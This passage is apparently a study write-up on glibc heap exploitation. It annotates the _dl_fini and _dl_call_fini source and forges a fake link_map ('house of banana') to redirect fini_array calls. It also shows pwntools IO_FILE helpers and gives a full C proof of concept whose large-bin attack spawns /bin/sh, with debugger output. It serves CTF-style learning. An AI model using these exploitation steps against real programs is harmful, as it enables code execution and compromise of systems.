         the main namespace.  */
      _dl_sort_maps(maps, nmaps, (ns == LM_ID_BASE), true); 

      /* We do not rely on the linked list of loaded object anymore
         from this point on.  We have our own list here (maps).  The
         various members of this list cannot vanish since the open
         count is too high and will be decremented in this loop.  So
         we release the lock so that some code which might be called
         from a destructor can directly or indirectly access the
         lock.  */
      __rtld_lock_unlock_recursive(GL(dl_load_lock));

      /* 'maps' now contains the objects in the right order.  Now
         call the destructors.  We have to process this array from
         the front.  */
	  // nmaps = 4
      for (i = 0; i < nmaps; ++i) {
        struct link_map *l = maps[i];   // _ns_loaded

        if (l->l_init_called) {
          _dl_call_fini(l);            // step into this function
#ifdef SHARED
          /* Auditing checkpoint: another object closed.  */
          _dl_audit_objclose(l);
#endif
        }

        /* Correct the previous increment.  */
        --l->l_direct_opencount;
      }

#ifdef SHARED
      _dl_audit_activity_nsid(ns, LA_ACT_CONSISTENT);
#endif
    }
  }

#ifdef SHARED
  if (!do_audit && GLRO(dl_naudit) > 0) {
    do_audit = 1;
    goto again;
  }

  if (__glibc_unlikely(GLRO(dl_debug_mask) & DL_DEBUG_STATISTICS))
    _dl_debug_printf(
        "\nruntime linker statistics:\n"
        "           final number of relocations: %lu\n"
        "final number of relocations from cache: %lu\n",
        GL(dl_num_relocations), GL(dl_num_cache_relocations));
#endif
}

Reaching _dl_call_fini

It contains the call ((fini_t)array[sz])(). Its argument is the map, i.e. GL(dl_ns)[ns]._ns_loaded from above and its next, next->next, ...

void _dl_call_fini(void *closure_map) {
  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded and its l_next pointers
  // pwndbg> p *(struct link_map *) <address printed by the previous command>
  struct link_map *map = closure_map;

  /* When debugging print a message first.  */
  if (__glibc_unlikely(GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
    _dl_debug_printf("\ncalling fini: %s [%lu]\n\n", map->l_name, map->l_ns);

  /* Make sure nothing happens if we are called twice.  */
  map->l_init_called = 0;

  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[26]
  ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY];
  if (fini_array != NULL) {
	// pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_addr
	// pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[26].d_un.d_val
    ElfW(Addr) *array = (ElfW(Addr) *)(map->l_addr + fini_array->d_un.d_ptr);
    // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[28].d_un.d_val / 8
    size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof(ElfW(Addr)));
	// whatever the types are, the address of the function that finally gets called can be computed
    while (sz-- > 0) ((fini_t)array[sz])();
  }

  /* Next try the old-style destructor.  */
  ElfW(Dyn) *fini = map->l_info[DT_FINI];
  if (fini != NULL)
    DL_CALL_DT_FINI(map, ((void *)map->l_addr + fini->d_un.d_ptr));
}

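All that matters is getting control of this function call. To make the if conditions easier to pass, the usual choice is to replace the last link_map in the list, i.e. to target the third l_next: _ns_loaded.l_next.l_next.l_next

Below is part of the structure, trimmed to what is needed
Forge l_addr and the contents of fini_array->d_un.d_ptr
DT_FINI_ARRAY is 26, DT_FINI_ARRAYSZ is 28
The source can be rather abstract, so it is easier to print the structure directly; only the useful part is shown here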

pwndbg> p **(struct link_map **) 0x7ffff7fbb188
$5 = {
  l_addr = 140737349943296,
  l_name = 0x7ffff7fbb660 "/lib/x86_64-linux-gnu/libc.so.6",
  l_ld = 0x7ffff7e18bc0,
  l_next = 0x7ffff7fbbb90,
  l_prev = 0x7ffff7fbb170,
  l_real = 0x7ffff7fbb680,
  l_ns = 0,
  l_libname = 0x7ffff7fbbb10,
  l_info = {0x0, 0x7ffff7e18bc0, 0x7ffff7e18c70, 0x7ffff7e18c60, 0x7ffff7e18c00, 0x7ffff7e18c20, 0x7ffff7e18c30, 0x7ffff7e18ca0, 0x7ffff7e18cb0, 0x7ffff7e18cc0, 0x7ffff7e18c40, 0x7ffff7e18c50, 0x0, 0x0, 0x7ffff7e18bd0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18c80, 0x0, 0x0, 0x7ffff7e18c90, 0x0, 0x7ffff7e18be0, 0x0, 0x7ffff7e18bf0, 0x0, 0x0, 0x7ffff7e18cf0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18d10, 0x7ffff7e18d00, 0x7ffff7e18ce0, 0x7ffff7e18cd0, 0x0, 0x0, 0x7ffff7e18d30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18d20, 0x0 <repeats 25 times>, 0x7ffff7e18c10},

pwndbg> ptype ((struct link_map **) 0x7ffff7fbb188 )->l_info
	type = struct {
	    Elf64_Sxword d_tag;
	    union {
	        Elf64_Xword d_val;
	        Elf64_Addr d_ptr;
	    } d_un;
	} *[77]

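Forging, at heap address A

l == l->l_real => A + 0x28 must hold the heap address A. 0x28 = distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_real
l->l_init_called must be non-zero; the exact value and offset depend on the version. distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_init_called. I measured 0x312
map.l_info[26] must be non-zero, distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_info[26]
The d_val at *(map.l_info[28]) + 8 controls the loop count (sz = d_val / 8); it is usually set so that the loop runs once
The execution flow is controlled through map->l_addr + fini_array->d_un.d_ptr, that is map->l_addr + map->l_info[26]->d_un.d_ptr
fini_array, map.l_info[26], is at offset 0x110, so index 28 is at 0x120

// l == l->l_real
fake+0x28 = fake
// l->l_init_called; in testing this turned out to be a magic number, so print l_init_called of the other link_maps and copy the value
fake+0x312 = 0x1

// note: the l_next slot has to be set to 0

// the rest is fairly fixed
// map.l_info[26]
fake+0x110 = fake+0x40
// 0x48 is the d_un member of that entry
fake+0x48 = fake+0x58
// the array entry that ends up being called
fake+0x58 = shell    // l_addr is 0, so array = fake+0x58 and array[0] = shell

// map.l_info[28]; its entry overlaps the d_un member of the l_info[26] entry
fake+0x120 = fake+0x48
// d_un of l_info[28]: 8 / sizeof(pointer) gives sz=1
fake+0x50 = 8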
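The pseudo-assignments above can be checked by building the fake link_map as bytes and replaying the pointer arithmetic of _dl_call_fini on it. This is a sketch under assumptions: `build_fake_map` and `fini_targets` are hypothetical helpers, the l_init_called offset and value (0x31c, 0x4011d) are the version-dependent numbers used in the demo at the end of this article, and the addresses are made up.

```python
import struct

L_ADDR, L_NEXT, L_REAL, L_INFO = 0x0, 0x18, 0x28, 0x40
DT_FINI_ARRAY, DT_FINI_ARRAYSZ = 26, 28   # l_info[26] at 0x110, l_info[28] at 0x120


def build_fake_map(fake, shell, flags_off=0x31C, flags_val=0x4011D, size=0x400):
    """Return the bytes of a fake link_map that will live at address `fake`."""
    buf = bytearray(size)

    def put(off, val):
        struct.pack_into("<Q", buf, off, val)

    put(L_ADDR, 0)                                     # l_addr = 0
    put(L_NEXT, 0)                                     # l_next = 0 ends the list walk
    put(L_REAL, fake)                                  # l == l->l_real
    put(L_INFO + 8 * DT_FINI_ARRAY, fake + 0x40)       # l_info[26]
    put(0x48, fake + 0x58)                             # l_info[26]->d_un.d_ptr
    put(0x58, shell)                                   # array[0]
    put(L_INFO + 8 * DT_FINI_ARRAYSZ, fake + 0x48)     # l_info[28]
    put(0x50, 8)                                       # l_info[28]->d_un.d_val, so sz = 1
    put(flags_off, flags_val)                          # l_init_called area (version-dependent)
    return bytes(buf)


def fini_targets(buf, fake):
    """Replay the arithmetic of _dl_call_fini; return the addresses it would call."""
    def rd(addr):
        return struct.unpack_from("<Q", buf, addr - fake)[0]

    fini_array = rd(fake + L_INFO + 8 * DT_FINI_ARRAY)
    if fini_array == 0:
        return []
    array = rd(fake + L_ADDR) + rd(fini_array + 8)     # l_addr + d_un.d_ptr
    sz = rd(rd(fake + L_INFO + 8 * DT_FINI_ARRAYSZ) + 8) // 8
    return [rd(array + 8 * i) for i in reversed(range(sz))]


FAKE, SHELL = 0x5555555596D0, 0x555555555289           # made-up addresses
print([hex(t) for t in fini_targets(build_fake_map(FAKE, SHELL), FAKE)])
```

With l_addr left at 0, the only address produced is the one stored at fake+0x58, matching the pseudo-assignments.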

pwntools filepointer

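The pwntools documentation shows that it also has a fair amount of built-in support for IO_FILE exploitation

from pwnlib.filepointer import *

The IO_FILE structure

_wide_data is the member commonly exploited these days.
Changing a member takes nothing more than a direct assignment such as fs.flags = 0x123
Two unknown members pad the structure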

FileStructure(null=0xdeadbeef)

>>> FileStructure()
{ flags: 0x0
 _IO_read_ptr: 0x0
 _IO_read_end: 0x0
 _IO_read_base: 0x0
 _IO_write_base: 0x0
 _IO_write_ptr: 0x0
 _IO_write_end: 0x0
 _IO_buf_base: 0x0
 _IO_buf_end: 0x0
 _IO_save_base: 0x0
 _IO_backup_base: 0x0
 _IO_save_end: 0x0
 markers: 0x0
 chain: 0x0
 fileno: 0x0
 _flags2: 0x0
 _old_offset: 0xffffffff
 _cur_column: 0x0
 _vtable_offset: 0x0
 _shortbuf: 0x0
 unknown1: 0x0
 _lock: 0x0
 _offset: 0xffffffffffffffff
 _codecvt: 0x0
 _wide_data: 0x0
 unknown2: 0x0
 vtable: 0x0}

house of orange

The io_list_all address
The address of the forged vtable

>>> fileStr = FileStructure(0xdeadbeef)
>>> payload = fileStr.orange(io_list_all=0xfacef00d, vtable=0xcafebabe)

stdout leak

Leak size bytes of data starting at addr

>>> fileStr = FileStructure(0xdeadbeef)
>>> payload = fileStr.write(addr=0xcafebabe, size=100)

Packing: since a file structure has to be forged, the following functions are useful

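# Packs according to context.arch, similar to the p32 and p64 functions
flat([
	  con1,
	  con2
])

# offset: con, similar to cyclic(offset) + p64(con)
flat({
	0xe0: 100
})

# Relative offsets
>>> flat({0xe0:{0x0: 100, 0x10: 200}})

# The filler and the total length can be specified too, since a forged structure has to satisfy certain conditions
flat({0xe0:0x100}, filler=b"\x00", length=0x200)

# Used the same way as flat({}); the official documentation lists it as an alias of flat
fit({})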
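For readers without pwntools at hand, the offset form can be approximated with the standard library. The helper below, `fit_offsets`, is hypothetical and is not part of pwntools; it only illustrates what I would expect flat({0xe0: 0x100}, filler=b"\x00", length=0x200) to produce when context.arch is a 64-bit little-endian target.

```python
import struct


def fit_offsets(fields, length, filler=b"\x00"):
    """Place 64-bit little-endian values at byte offsets inside a filled buffer."""
    buf = bytearray((filler * length)[:length])
    for off, val in fields.items():
        struct.pack_into("<Q", buf, off, val)
    return bytes(buf)


payload = fit_offsets({0xE0: 0x100}, length=0x200)
print(len(payload), payload[0xE0:0xE8].hex())
```

Unlike the real flat, this sketch handles neither nested dicts, strings, nor the cyclic default filler.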

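Testing

It is best to step through the largebin attack and house_of_banana by hand in a debugger.

house of banana

The demo follows the one in the article "house_of_banana源码分析" (a source-level analysis of house_of_banana)

Remember to adjust the rtld-related pointers and the libc offsets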

makefile

CC := gcc
CFLAGS := -g 

all: house_of_banana large_bin_attack
default: house_of_banana  large_bin_attack

TARGET := house_of_banana  large_bin_attack

house_of_banana: house_of_banana.c 
	$(CC) $(CFLAGS) $^ -o $@

large_bin_attack: large_bin_attack.c 
	$(CC) $(CFLAGS) $^ -o $@

clean:
	rm -f $(TARGET)

house of banana

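Set l_next of the forged structure to 0
l_init_called needs a rather magic value; print it for the specific libc
Tested on ubuntu 22.04 LTS: under gdb one command can be executed and then the process crashes.
Newer libc versions were not tested because no patched binary was available, but judging by the source the technique should work (in theory)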

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void shell() { 
  execve("/bin/sh", NULL, NULL);
}
uint64_t get_libc_base() {
  uint64_t to;
  uint64_t from;
  char buf[0x400];

  FILE *file;
  file = fopen("/proc/self/maps", "r");
  if (file == NULL) return 0;
  while (fgets(buf, sizeof(buf), file)) {
    // printf("%s\n", buf);
    if (strstr(buf, "libc.so.6") != NULL) {
      sscanf(buf, "%lx-%lx", &from, &to);
      fclose(file);
      printf("libc => %#lx-%#lx\n", from, to);
      // getchar();
      return from;
    }
  }
  fclose(file);
  return 0;  // libc mapping not found
}

int main() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  uint64_t libc_base = get_libc_base();
  uint64_t rtld_global = libc_base + 0x3fd040;
  // &_rtld_global &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
  uint64_t *next_node = (uint64_t *)(rtld_global - 0x41ec8);
  uint64_t *p1 = malloc(0x428);
  uint64_t *g1 = malloc(0x18);

  uint64_t *p2 = malloc(0x418);
  uint64_t *g2 = malloc(0x18);

  free(p1);
  uint64_t *g3 = malloc(0x438);  // force p1 to be inserted into the large bin
  free(p2);                      // p2 goes into the unsorted bin
  p1[3] = ((uint64_t)next_node - 0x20);  // overwrite p1->bk_nextsize
  uint64_t *g4 = malloc(0x438);          // force p2 to be inserted into the large bin

  // the writes below act like a UAF modification
  uint64_t fake = (uint64_t)p2 - 0x10;  // chunk_header
  *(uint64_t *)(fake + 0x28) = fake;
  *(uint64_t *)(fake + 0x31c) = 0x4011d;
  *(uint64_t *)(fake + 0x110) = fake + 0x40;
  *(uint64_t *)(fake + 0x48) = fake + 0x58;
  *(uint64_t *)(fake + 0x58) = (uint64_t)shell;
  *(uint64_t *)(fake + 0x120) = fake + 0x48;
  *(uint64_t *)(fake + 0x50) = 0x8;

  // _rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next now holds the address of p2
  // so the last link_map visited during the list walk is p2
  // it helps to look at p *(struct link_map *) p2_addr

  // problem: assert i < nloaded fails, so ((struct link_map *) fake)->l_next has to be set to 0
  p2[1] = 0;

  // problem: l_init_called was 0
  // *(uint64_t*)(fake+0x31c) = 0x4011d; behaves like a magic number
  // it has to match the value found in the other link_maps, so print one and copy it

  // in the end the program still crashed 😥.

  /*
    0x7ffff7fc9242 <_dl_fini+514>    nop    word ptr [rax + rax]
    0x7ffff7fc9248 <_dl_fini+520>    mov    qword ptr [rbp - 0x38], rax
  ► 0x7ffff7fc924c <_dl_fini+524>    call   qword ptr [rax] <shell>

  pwndbg> bt
    #0  0x000055555555529b in shell () at house_of_banana.c:7
    #1  0x00007ffff7fc924e in _dl_fini () at ./elf/dl-fini.c:142
    #2  0x00007ffff7c45495 in __run_exit_handlers (status=0,
    # ...
  */

  // under gdb, however, one command can be executed before the crash

/*
pwndbg> c
Continuing.
process 6591 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 2: Function "shell" not defined.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
$ cat flag.txt
[Attaching after Thread 0x7ffff7fa7740 (LWP 6591) vfork to child process 6594]
[New inferior 2 (process 6594)]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Detaching vfork parent process 6591 after child exec]
[Inferior 1 (process 6591) detached]
process 6594 is executing new program: /usr/bin/cat
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
flag{house_of_banana_is_good}
[Inferior 2 (process 6594) exited normally]
$ [5]  + 6580 suspended (tty output)  gdb house_of_banana
*/

  return 0;
}